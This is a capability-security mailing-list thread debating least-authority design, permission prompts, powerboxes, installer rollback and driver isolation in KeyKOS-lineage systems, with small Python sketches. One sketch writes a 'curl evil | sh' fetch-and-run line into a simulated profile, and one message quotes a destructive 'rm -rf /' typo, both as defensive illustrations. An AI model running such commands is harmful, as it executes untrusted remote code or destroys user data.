re: pola etc.

Raoul Duke

Aug 11, 2022, 4:31:05 PM8/11/22
to cap-...@googlegroups.com
The problem is, I also need to know exactly what the code is going to
do with it, not just that it wants refined access. Code can
maliciously leak stuff. Code can also accidentally leak stuff. To me,
from a UX security perspective, it is still very much a bad joke to
have all these fine-grained popups on our devices. What good does it
do me, really? What good does it do overall when people get worn down
by them in the first week? I don't think we should just leave the barn
doors open, no, and I do believe in defense-in-depth vs. crimes of
opportunity. Though with digital copies one fundamentally cannot ever
take the data back / scour it after it has been leaked. The only way
to win is not to play. I wish all security presentations started with
that quote on the first slide just to be clear and honest.
/grumpytoday.

Mark S. Miller

Aug 11, 2022, 7:36:27 PM8/11/22
to cap-...@googlegroups.com
Hi Raoul, what is this responding to?



--
  Cheers,
  --MarkM

Raoul Duke

Aug 11, 2022, 8:48:50 PM8/11/22
to cap-...@googlegroups.com
Apologies, that was just a "re:" in the expansive sense of all
attempts to improve security and UX, not a direct reply to any
particular message here.

Mark S. Miller

Aug 11, 2022, 9:13:01 PM8/11/22
to cap-...@googlegroups.com
On Thu, Aug 11, 2022 at 1:31 PM Raoul Duke <rao...@gmail.com> wrote:
> The problem is, I also need to know exactly what the code is going to
> do with it, not just that it wants refined access.

What? IIUC, I could not disagree more. The whole point of POLA is to bound risk by bounding authority. I need to know that a bound is enforced. I do *not* need to know exactly what it does within that bound.
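
A minimal sketch, in Python, of what bounding authority can look like in an object-capability style; the names are illustrative, and Python's underscore privacy is only a convention (a real ocap language enforces the encapsulation), but the shape of the pattern is:

    import io

    class ReadOnlyFile:
        """Attenuating facet: wraps a file, exposes only the read authority."""
        def __init__(self, f):
            self._f = f   # the full-powered object stays encapsulated

        def read(self, n=-1):
            return self._f.read(n)

    def untrusted_consumer(cap):
        data = cap.read()   # within the bound: fine, whatever it does with it
        # cap.write(b"x") would raise AttributeError: that authority was
        # never granted, so there is nothing to audit on the write side.

    # The caller bounds risk by bounding what it hands over; it does not
    # need to know what untrusted_consumer does within that bound.
    untrusted_consumer(ReadOnlyFile(io.BytesIO(b"pixel data")))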
 
> Code can maliciously leak stuff. Code can also accidentally leak
> stuff.

We know how to prevent overt leakage, so I assume you're talking about non-overt channels.
Aside from crypto keys, which should be specially protected anyway, we can and should generally engineer systems so that integrity does not depend on confidentiality. Authority should be access limited, not knowledge limited. For such systems done right, code can at most leak information, not access and authority.

To leak even information over non-overt channels, there must be someone within earshot to read that non-overt channel.
 
> To me, from a UX security perspective, it is still very much a bad
> joke to have all these fine-grained popups on our devices. What good
> does it do me, really? What good does it do overall when people get
> worn down by them in the first week?

Are you aware that this community practices POLA at the UI in a way that minimizes not just such popups but all interaction rituals that a user would understand as being only about security?
 
> I don't think we should just leave the barn doors open, no, and I do
> believe in defense-in-depth vs. crimes of opportunity. Though with
> digital copies one fundamentally cannot ever take the data back /
> scour it after it has been leaked.

Preventing information leakage (confidentiality) is indeed much harder than preventing authority leakage (integrity). And yes, with proper prearrangement authority can be revoked. Knowledge cannot be. Our security claims and practices need to take such constraints into account.
 
> The only way to win is not to play. I wish all security presentations
> started with that quote on the first slide just to be clear and
> honest. /grumpytoday.

The game I care about is to facilitate cooperation, and to lower the risk of cooperation. Robust composition. For that game, to not play is to lose.


--
  Cheers,
  --MarkM

Raoul Duke

Aug 11, 2022, 9:54:53 PM8/11/22
to cap-...@googlegroups.com
Thanks for your note.

(I am a pessimist.)

Sure, there are things that do make sense to me, e.g. maybe drag and
drop as implicit permission to open only that file. I think there are
layers of usefulness based on how personal/local the action is.

As soon as networking gets involved, it seems like all bets are off.
Asking me "can program foobar talk to server foobar.com?" doesn't
really help me all that much, even if foobar == somewellknowncorp. I
mean I just rubber-stamp things for the most part. There's no way I
can vet what they are doing on their side, heaven knows. And the local
app in question could have been saving up all sorts of sneaky things
to splurt out over the network if I eventually allow it for some use
case of mine later on. "Do you want to share image X? Then (a) give me
permission to read it locally [ok, I guess] and (b) give me permission
to use the network <utterly arbitrarily with no real restrictions
because, what, you are going to somehow audit each and every message
that goes over protobuf or something?> so I can send it, thanks!"

On occasion, sure, I've said no to some sketchy permission request
and/or then uninstalled some app, and maybe that saved me from
something malicious there and then. But in general, if I've got an
app, I already obtained it from somewhere that I kind of already
"trust", and I don't know what the thing is really, really, really
doing under the covers... I just click through... The dialog boxes
asking to allow it to "read my photos" or "use the network" don't
really tell me what on earth it is truly doing with the resource once
it has that permission. (Let alone the app stores, and how ungranular
their permissions are, and how apps that I would personally absolutely
never install, based on what they declare for their permission needs,
still have millions of downloads and 4+ star reviews, wtf.)

And once any digital information is out of the barn, that's it, game
over, end of story.

I'm more enamored with it in terms of people writing their own code
and wanting to avoid mistakes where they somehow end up screwing
themselves. Oops I didn't mean to "rm -rf / home/myself/SecretDocs"
etc. Although I have had it up to here with Xcode asking me every
damned time I run my unit tests if it can have permission to access my
Documents folder, for example.

So even if there were a way for all this to work in theory, frankly I
have zero proof / lots of negative proof that on the whole it will be
done well enough en masse.

Ben Laurie

Aug 12, 2022, 11:58:57 AM8/12/22
to cap-talk
On Fri, 12 Aug 2022 at 02:13, Mark S. Miller <eri...@gmail.com> wrote:
> On Thu, Aug 11, 2022 at 1:31 PM Raoul Duke <rao...@gmail.com> wrote:
> > The problem is, I also need to know exactly what the code is going to
> > do with it, not just that it wants refined access.
>
> What? IIUC, I could not disagree more. The whole point of POLA is to bound risk by bounding authority. I need to know that a bound is enforced. I do *not* need to know exactly what it does within that bound.

You are correct, of course, but I think the point Raoul is trying to make is that POLA doesn't solve all the problems with processing data.

Of course, it does solve many interesting problems - but it does not directly help with situations where I *want* to share data and also want certainty about what happens to that data. POLA is not the whole answer there, but it is certainly a useful tool.

Solving this problem is what Project Oak is all about, of course - and it is a far harder problem to solve.

BTW, another failure mode I see a lot with POLA is a total failure to put any thought into what authorities are useful to grant and how to manage them.


 

Bill Frantz

Aug 12, 2022, 1:34:33 PM8/12/22
to cap-...@googlegroups.com

On Aug 11, 2022, at 21:54:39, Raoul Duke <rao...@gmail.com> wrote:

> As soon as networking gets involved, it seems like all bets are off.
> Asking me "can program foobar talk to server foobar.com?" doesn't
> really help me all that much, even if foobar == somewellknowncorp. I
> mean I just rubber-stamp things for the most part. There's no way I
> can vet what they are doing on their side, heaven knows. And the local
> app in question could have been saving up all sorts of sneaky things
> to splurt out over the network if I eventually allow it for some use
> case of mine later on.
>
> "Do you want to share image X? Then (a) give me permission to read it
> locally [ok, I guess] and (b) give me permission to use the network
> <utterly arbitrarily with no real restrictions because, what, you are
> going to somehow audit each and every message that goes over protobuf
> or something?> so I can send it, thanks!"

We can avoid the problem of stashed secrets by implementing the sharing of X with an object that does the sharing and has no secret data when it is created. Using the KeyKOS concept of a "Factory", this might look like:

  sharer = discrete.new(dataSharer(powerbox));  // instantiate only if discrete
  sharer();                                     // perform the sharing

discrete checks that the dataSharer factory is indeed discrete (i.e. has no outside data connections) and creates an instance if that is true. The call on sharer() causes the sharing to take place. The sharer uses the powerbox passed in to acquire access to the data to be shared. For the remote site, the powerbox returns a capability which gives the right to send/receive on a TLS channel that was built by trusted code. Now we only need to trust the other end named by the user.
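
A hedged sketch of the same pattern in Python (the discrete check, the powerbox, and all of their method names are stand-ins invented here; KeyKOS factories differ in detail):

    class Factory:
        def __init__(self, make, holes=()):
            self.make = make
            self.holes = holes   # outside data connections baked in at build time

    def discrete_new(factory, powerbox):
        # The "discrete" check: refuse any factory with prior outside
        # connections, so a new instance cannot hold stashed secrets.
        if factory.holes:
            raise PermissionError("factory is not discrete")
        return factory.make(powerbox)

    def data_sharer(powerbox):
        def share():
            data = powerbox.read_user_selected_file()   # user-mediated read
            powerbox.send_to_user_named_peer(data)      # trusted TLS channel
        return share

    class StubPowerbox:
        """Stand-in for the user's trusted agent (hypothetical API)."""
        def read_user_selected_file(self):
            return b"bytes of the file the user picked"
        def send_to_user_named_peer(self, data):
            print("sending %d bytes to the endpoint the user named" % len(data))

    sharer = discrete_new(Factory(data_sharer), StubPowerbox())
    sharer()   # the sharer was created empty, just now: nothing saved up to leak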

Cheers - Bill


Raoul Duke

Aug 12, 2022, 7:38:20 PM8/12/22
to cap-...@googlegroups.com
I feel like POLA is still a little too pie-in-the-sky or simplistic
for me in terms of how it helps me vs. malicious code specifically. It
seems to me there are lots of architectural issues 'underneath' it,
undermining it, in many important real-world scenarios for the
foreseeable future, en masse. I guess another way of saying it would
be to ask: on what current systems do people think POLA can truly help
vs. evil code?

When an app wants to install on Windows, I get a dialog box asking me
if the setup.exe can make (arbitrary) changes to my entire hard drive.
Even if it were to say that it was going to try to restrict itself in
some ways, I think the cognitive load is simply too much for users.
Does joe-user really know what folders should be allowed? How much of
the registry should be allowed? etc. I sure do not. If the app only
has successful POLA after it has been installed, aren't all bets off,
since who knows what crazy or nefarious things it might have done
during that install phase?

Do we have to boil the OS ocean in order to get an actually robust
security benefit, not a fig leaf or a false sense of security, for
joe-users in the world? Presumably until the OS fundamentally
requires, supports, and enforces all the nuances, it is still kind of
hypothetical?

(I do differentiate between using POLA to help me not screw myself
accidentally vs. trying to defend against malicious code. The former
makes sense to me; the latter always feels unrealistic. And I am
ignoring side-channel attacks.) I guess POLA feels logically
maybe-necessary to me, but not sufficient.

Ian Denhardt

Aug 12, 2022, 8:37:55 PM8/12/22
to Raoul Duke, cap-...@googlegroups.com
Quoting Raoul Duke (2022-08-12 19:38:06)

> Does joe-user really know what folders should be
> allowed? How much of the registry should be allowed? etc. I sure do
> not. If the app only has successful POLA after it has been installed,
> aren't all bets off, since who knows what crazy or nefarious things
> it might have done during that install phase?

Right, so a design principle: apps should ask for access when they
need it, not at install time. This has two benefits:

- It becomes much easier for the user to understand why the app is
asking, since if legitimate it will likely be based on something they
just asked the app to do.
- The "permissions" request can often be folded into a functionality
choice -- so in the ideal case you go to File -> Open and select a
file through the powerbox, the same UX as is common today: no need for
a separate/explicit *permission* prompt, since if you wanted to deny
the request you'd just hit "cancel" (see the sketch below).
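
A hedged sketch of that second point in Python, with a made-up powerbox API: the file dialog runs in the trusted shell, and the app receives a handle to exactly the one file the user chose (or nothing, if they cancel).

    import io

    class Powerbox:
        """Trusted-shell side; the app never sees the filesystem namespace."""
        def open_via_picker(self):
            handle = self._run_trusted_file_dialog()
            if handle is None:                           # the user's "deny" is
                raise PermissionError("user cancelled")  # just hitting cancel
            return handle                                # the grant = this one file

        def _run_trusted_file_dialog(self):
            # Stand-in for a real GUI picker owned by the shell, not the app.
            return io.BytesIO(b"contents of the file the user chose")

    def app_open_command(powerbox):
        # No separate permission prompt: choosing the file *is* the grant.
        return powerbox.open_via_picker().read()

    print(app_open_command(Powerbox()))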

Retrofitting this onto existing systems is a separate question:

> Do we have to boil the OS ocean in order to get an actually robust
> security benefit, not a fig leaf or a false sense of security, for
> joe-users in the world? Presumably until the OS fundamentally
> requires, supports, and enforces all the nuances, it is still kind of
> hypothetical?

Rolling this out in light of existing systems is definitely the hard
part. But there's no need to boil the ocean before seeing any benefit.
I can e.g. use Sandstorm for some collaborative web-app things, where
it's able to do them, and gain the benefits within that scope, before
I've fixed the whole world.

But yeah, dealing with legacy systems is a pain.

Alan Karp

Aug 13, 2022, 12:43:29 AM8/13/22
to cap-...@googlegroups.com
On Fri, Aug 12, 2022 at 5:37 PM Ian Denhardt <i...@zenhack.net> wrote:

> But yeah, dealing with legacy systems is a pain.

Polaris pointed the way to do this, but Bromium (now owned by HP) did it far better.  Each application runs in its own lightweight virtual machine using copy-on-write.  The result is very strong isolation between instances of applications.  Even a successful attack against the OS gains nothing, and the user experience is nearly identical to a standard Windows system.  The one thing they haven't done (yet?) is to support things like comparing two documents.

--------------
Alan Karp

William ML Leslie

Aug 13, 2022, 3:14:58 AM8/13/22
to cap-talk
+1.  Raoul mentioned installers - this is a great case for being able to examine the filesystem changes a program has made during a transaction, and then committing or rolling them back.  I haven't gotten that far yet, but I want to do this when we start representing a hierarchical file system to legacy programs in Coyotos.  Running a legacy program, by default, won't apply changes to your filesystem; you will get an overlay with a diff that you can examine and will have to approve to apply.  I expect we'll get to a point where we can clearly identify some pre-XDG_HOME patterns and encode most of the places programs actually touch into either the initial grant (app config) or custom shell wiring (cf. Shill).
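
Roughly the shape I mean, as a toy Python sketch; a dict of pending writes stands in for the overlay here, which is nothing like the actual Coyotos plumbing:

    class OverlayTxn:
        """Copy-on-write view: the legacy program writes here, not to disk."""
        def __init__(self, base):
            self.base = base     # the real filesystem, untouched during the txn
            self.pending = {}    # path -> new contents: the reviewable diff

        def write(self, path, data):
            self.pending[path] = data

        def read(self, path):
            return self.pending.get(path, self.base.get(path))

        def diff(self):
            return sorted(self.pending)     # what the user gets to examine

        def commit(self):
            self.base.update(self.pending)  # approved: apply for real
            self.pending.clear()

        def rollback(self):
            self.pending.clear()            # declined: nothing ever happened

    base = {"/etc/hosts": b"127.0.0.1 localhost\n"}
    txn = OverlayTxn(base)
    txn.write("/home/me/.profile", b"curl evil | sh\n")  # installer misbehaves
    print(txn.diff())   # ['/home/me/.profile'] -- inspect, then decide
    txn.rollback()      # base is unchanged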

I don't quite like this for new programs, but I do think that visibility together with undo is great for those cases where undo is feasible.  Of course, it isn't always feasible, so you still need POLA.

I sympathise with the original point, though.  Firstly, for a user, security questions are often difficult to understand.  Poor abstractions compound the problem; in an Android app I've needed to ask for complete access to removable media just to read a single file.  One of my favourite Android vulnerabilities, StrandHogg, is confusion over whether you're granting access to an Activity or a Task.  I'm hyper-aware of this sort of thing, and I still couldn't tell you how and when most apps make use of the access they have been granted, or how long an app will remain authorised.  It also bothers me that apps can tell if you've said no; Android should really provide those apps with a stub that produces plausible nonsense.

As an example, WhatsApp requires the "Phone" permission.  You can't make IP calls without it.  The reason is understandable - they want to switch to hold mode when you get an incoming call.  The permission itself is much broader, though, potentially giving Meta access to your call history metadata.  There's evidently nothing I can do about this, unless I want to disable it and re-enable it every time I open or close WhatsApp.

On a related note, I'd love to have an app that would show the Android 11 drop-down for notifications and settings on Android 12, as I really dislike having to swipe twice.  Unfortunately, this is the most trusted part of the UI; there's no API on Android that can get you a notification drop-down that wouldn't require dangerous levels of access, and even if it were feasible, no way to know from Google Play that the app really is exactly what the source claims to be in the repo.  Maybe I've missed the tutorial on writing your own Android system shell and that's just a thing people do.

I seem to have strayed from "POLA doesn't solve everything" to "Vexing points in Android's security model" but somehow it doesn't feel to me like I've veered off the original point.  Am I getting close, Raoul?

--
William ML Leslie

Raoul Duke

Aug 13, 2022, 3:16:13 PM8/13/22
to cap-...@googlegroups.com
> Android woes. 

Agreed that the mainstream (mobile, desktop, and, ha ha, IoT?) has yet to build a successful, reasonable, usable, actually-more-secure POLA-based experience. Not that it would be easy.

That should not stop people from trying to push forward; all credit to the people here who have been leading the uphill battle!

...rambling ensues, apologies, you have been warned:

There's the delta between the pragmatic reality vs. the vocabulary used to describe & market things. Things like Bromium incorporate a bit too much heuristics for my taste, from what I read. Unfortunately it is of limited availability? Good that it has been successful, and I absolutely wish I could have it right now, immediately, on all my devices!

My knee-jerk / pie-in-the-sky complaint is that, as a simpleton human, I want a human mental model (in a natural language supporting interrogatives, on top of an underpinning of formally analyzed legal+logical definitions) of what is going to / currently is / might later be happening to my data. I don't see how we can claim people are in control of their data otherwise.

There are too many nuances involved in delivering the features and experiences people respond to; we could never vet nor explain them all. Extracting an image fingerprint for similar-image search: is that just for me, locally, to find all my cat photos, or is it for CSAM scanning, with its questionable oopsy-throw-away-the-key bad-result potentialities? Worse: all the claims of handling and limiting PII carefully vs. all the cracks and leaks of datasets which can then be statistically merged to get pinpoint results.

At some level it is the difference between business done on a handshake vs. a 300-page prenup. Any form of permission is open to misinterpretation, either accidental or on purpose, hence the legal system to work out, ahem, misunderstandings. As blockchain contracts seem to me to have proven, I'd sort of prefer that the law of the land gets involved, with real regulation and consequences for bad action; the leaky software-contract abstraction oopsies will inevitably burn some folks badly. But I also fear the meat grinder that is the user-to-prison pipeline. And digital data is pandora's horse out of the barn gate; anything we do is fundamentally a band-aid. (Though maybe homomorphic operations can reduce the rate at which bits are exfiltratable?)

Is Trust something that can be formalized in a robust yet usable way? Not that that is a new question; I realize it is the underpinning of what people here dedicate themselves to! The flip side is to formalize Threats. A calculus. I hope the work in that area continues.

I think there are so many ways for digital systems to break trust, either by accident or on purpose, that we need a clear set of terms for it, so we can have concise framings of exactly what threat model is being addressed and how statistically strong the defense is, and so we can compose with components that address other parts of the threat-trust-security-usability gestalt.

(A fundamental, oy-veh, existential, throw-my-hands-up-in-the-air fear of mine: who cares how much work goes into the upper layers when god knows there are bugs and back doors and sploits all through the hardware stack? So I end up feeling like security can mainly, realistically, only help me avoid screwing myself with typos, and maybe stop the occasional script-kiddie crime of opportunity.)

Raoul Duke

Aug 13, 2022, 3:19:54 PM8/13/22
to cap-...@googlegroups.com
> Installers 

probably also needs a successful way to control opaque binary-blob hardware drivers?

Also, trust chains are weak links, I feel. So many ways to do MITM on certs, and they are obviously always a high-priority target for every kind of tricky or $$$ overt penetration engineering.

William ML Leslie

Aug 14, 2022, 12:28:03 AM8/14/22
to cap-talk
On Sun, 14 Aug 2022 at 05:19, Raoul Duke <rao...@gmail.com> wrote:
> > Installers
>
> probably also needs a successful way to control opaque binary-blob hardware drivers?

I admit I'm not sure what "control" means in this case.  There's benefit both to good capability-oriented APIs for device and driver management and to hardware like the IOMMU for restricting the reach of devices.  To be clear, there's still a hole there during initialisation, in the form of PCI Option ROMs.


> Also, trust chains are weak links, I feel. So many ways to do MITM on certs, and they are obviously always a high-priority target for every kind of tricky or $$$ overt penetration engineering.

Again, I'm not sure what you're referring to.  Still, in the case of many trust chains, they just don't confirm anything meaningful.  Consider app signing on iOS - what is the threat model this is trying to address, exactly?  If it's trying to confirm that the image is the one the developer built and hasn't been modified in transit, well, you can already have that level of tamper resistance with TLS.

--
William ML Leslie

Raoul Duke

Aug 14, 2022, 1:08:45 AM8/14/22
to cap-...@googlegroups.com
> Installers, drivers, certs.

Just that if the overarching thing is "how do we manage Trust all the
way down, and out", then no matter how good the installer UI is, if
what I am doing is installing some binary-blob driver, the entire
gestalt of the process of installing things ideally also has ways to
make sure drivers are not doing mean things I dislike in the long run.
Yes, that is the job of the OS architecture and implementation, not
the installer app per se.

Bill Frantz

Aug 14, 2022, 11:24:24 PM8/14/22
to cap-...@googlegroups.com
In KeyKOS on the 370, we gave drivers, which could be user-written, access to a specific device via the Device capability. Since the full channel-programming model of the 370 had been the source of some significant security problems, we strongly limited the channel programs that could be run. We did use this system to run our terminals and our tape drives.

CapROS has a system for running “out of the box” Linux drivers in domains, but I don’t know much about how it works. For systems with memory mapped I/O, the memory mapping may be enough to limit a process to just one I/O device.

There’s a lot if ifs here, but with proper hardware architecture, it should be possible to run untrusted I/O drivers. At a minimum you want to be able to isolate devices so a process/domain can be limited to only one device. You want any direct memory access system to be limited to specific pages and devices, the way we did in 370 KeyKOS.

Cheers - Bill

Raoul Duke

Aug 14, 2022, 11:48:36 PM8/14/22
to cap-...@googlegroups.com
Are any of the KeyKOS lineage something we could ever run today on
real hardware? That would be awesome, I feel. :)
https://en.wikipedia.org/wiki/KeyKOS
https://www.cis.upenn.edu/~eros goes to a 404

William ML Leslie

Aug 15, 2022, 5:47:13 AM8/15/22
to cap-talk
Neither of these are really ready to make a song and dance about yet.

CapROS almost builds; we need to update some of the included libraries: https://github.com/capros-os

Coyotos runs; it just doesn't do very much. I've been trying to nail down some of the system-level details (secretary, shell, etc.) and haven't been keeping the repo up to date, but you can at least build from my branch: https://gitlab.com/william-ml-leslie/coyotos

If you want to try them out at this point, you'll need to build the cross tools yourself.  The capros-os version of the tools is slightly more up-to-date.
 
--
William ML Leslie

William ML Leslie

Aug 15, 2022, 5:56:38 AM8/15/22
to cap-talk
On Mon, 15 Aug 2022 at 13:24, Bill Frantz <fra...@pwpconsult.com> wrote:

> CapROS has a system for running "out of the box" Linux drivers in domains, but I don't know much about how it works. For systems with memory mapped I/O, the memory mapping may be enough to limit a process to just one I/O device.

It exposes the PCI configuration space and resource maps for the driver as native capabilities:


It's very nice, and everything it does, it gets right.  The only missing thing is securing device-initiated DMA (imao) and, by extension, the IOMMU, which is only on relatively recent hardware.


There’s a lot if ifs here, but with proper hardware architecture, it should be possible to run untrusted I/O drivers. At a minimum you want to be able to isolate devices so a process/domain can be limited to only one device. You want any direct memory access system to be limited to specific pages and devices, the way we did in 370 KeyKOS.

There's the additional step of selecting drivers for attached hardware and how to expose them to programs.  I _think_ Raoul's concerns about loading binary blobs fall into the first case:  if you are sure about which driver gains access to the device, you can make sure that other drivers can't upload malicious firmware.

--
William ML Leslie

Valerio Bellizzomi

Aug 15, 2022, 6:12:38 AM8/15/22
to cap-talk
Hi William, which OS do you use to build Coyotos?

William ML Leslie

Aug 15, 2022, 6:59:56 AM8/15/22
to cap-talk
On Mon, 15 Aug 2022 at 20:12, Valerio Bellizzomi <vbell...@gmail.com> wrote:
> Hi William, which OS do you use to build Coyotos?

Originally (2020), Guix, but using a tailored cross package.

Up until two weeks ago, debian stable, to reduce the number of moving parts.

The last couple of weeks I've been building on Pop!_OS.

It should build on pretty much anything; if you can build GCC and Binutils, and you've got openssl and some boost libraries, you can build the cross tools.  You'll also need python3 to build CapROS.

--
William ML Leslie

William ML Leslie

Aug 15, 2022, 7:27:16 AM8/15/22
to cap-talk
On Mon, 15 Aug 2022 at 20:12, Valerio Bellizzomi <vbell...@gmail.com> wrote:
> Hi William, which OS do you use to build Coyotos?

I mean - I'm aware that the correct answer is "T2 SDE" - it's just that despite having watched Rene for hundreds of hours, I'm not sure what the easy way is to package the cross tools.  They are mostly a bunch of patches against Binutils, GCC, and newlib; the full source for the cross tools is an annoyingly large package.  I bet if you just want it to work, it's not that hard, but I haven't tried to package it for T2.


--
William ML Leslie

Charlie Landau

Aug 15, 2022, 4:36:41 PM8/15/22
to cap-...@googlegroups.com
On 8/15/22 2:56 AM, William ML Leslie wrote:
> On Mon, 15 Aug 2022 at 13:24, Bill Frantz <fra...@pwpconsult.com> wrote:
> > CapROS has a system for running "out of the box" Linux drivers in domains, but I don't know much about how it works. For systems with memory mapped I/O, the memory mapping may be enough to limit a process to just one I/O device.
>
> It exposes the PCI configuration space and resource maps for the driver as native capabilities:
And on ARM, I/O is memory-mapped. CapROS can't protect any memory smaller than a page, but that's not usually a problem.

--
Charlie Landau
he/him/his (Why Pronouns Matter)

Charlie Landau

Aug 15, 2022, 4:50:23 PM8/15/22
to cap-...@googlegroups.com
On 8/15/22 2:47 AM, William ML Leslie wrote:
> On Mon, 15 Aug 2022 at 13:48, Raoul Duke <rao...@gmail.com> wrote:
> > Are any of the KeyKOS lineage something we could ever run today on
> > real hardware? That would be awesome, I feel. :)
> > https://en.wikipedia.org/wiki/KeyKOS
> > https://www.cis.upenn.edu/~eros goes to a 404
>
> Neither of these are really ready to make a song and dance about yet.
>
> CapROS almost builds; we need to update some of the included libraries: https://github.com/capros-os
At http://www.capros.org/ there is a link to a mailing list which will receive occasional updates on CapROS development.

Jonathan S. Shapiro

Aug 15, 2022, 8:07:47 PM8/15/22
to cap-talk
The same is true with EROS. On the ARM chip, this could be protected by a fast-path kernel trap, but that's about the best we get.


Rob Meijer

Aug 16, 2022, 3:08:00 AM8/16/22
to cap-...@googlegroups.com
I believe that when it comes to retrofitting POLA, all too often the same wrong question gets asked.

"Why does potentially malicious application X need access to location Y, where multiple entities store sensitive or not-to-be-overwritten data?"

When the question should be:

"Why does entity Z need to use location Y to store sensitive or not-to-be-overwritten data?"

Some old slides from an abandoned project (slides 21..27 are most relevant).



Mark S. Miller

Aug 16, 2022, 2:00:31 PM8/16/22
to cap-...@googlegroups.com
On Tue, Aug 16, 2022 at 12:08 AM Rob Meijer <pib...@gmail.com> wrote:
> I believe that when it comes to retrofitting POLA, all too often the same wrong question gets asked.
>
> "Why does potentially malicious application X need access to location Y, where multiple entities store sensitive or not-to-be-overwritten data?"
>
> When the question should be:
>
> "Why does entity Z need to use location Y to store sensitive or not-to-be-overwritten data?"
>
> Some old slides from an abandoned project (slides 21..27 are most relevant).


That's a really good slideshow! Is there also a recorded talk? I'd love to watch it sometime.
 

Rob Meijer

Aug 18, 2022, 7:56:18 AM8/18/22
to cap-...@googlegroups.com
On Tue, 16 Aug 2022 at 20:00, Mark S. Miller <eri...@gmail.com> wrote:


> On Tue, Aug 16, 2022 at 12:08 AM Rob Meijer <pib...@gmail.com> wrote:
> > I believe that when it comes to retrofitting POLA, all too often the same wrong question gets asked.
> >
> > "Why does potentially malicious application X need access to location Y, where multiple entities store sensitive or not-to-be-overwritten data?"
> >
> > When the question should be:
> >
> > "Why does entity Z need to use location Y to store sensitive or not-to-be-overwritten data?"
> >
> > Some old slides from an abandoned project (slides 21..27 are most relevant).
>
> That's a really good slideshow! Is there also a recorded talk? I'd love to watch it sometime.
 

It seems not. It was recorded at the OHM2013 conference and there are a lot of videos available from that conference, in different places,
but after looking for it for about two hours, I can't seem to find it.
 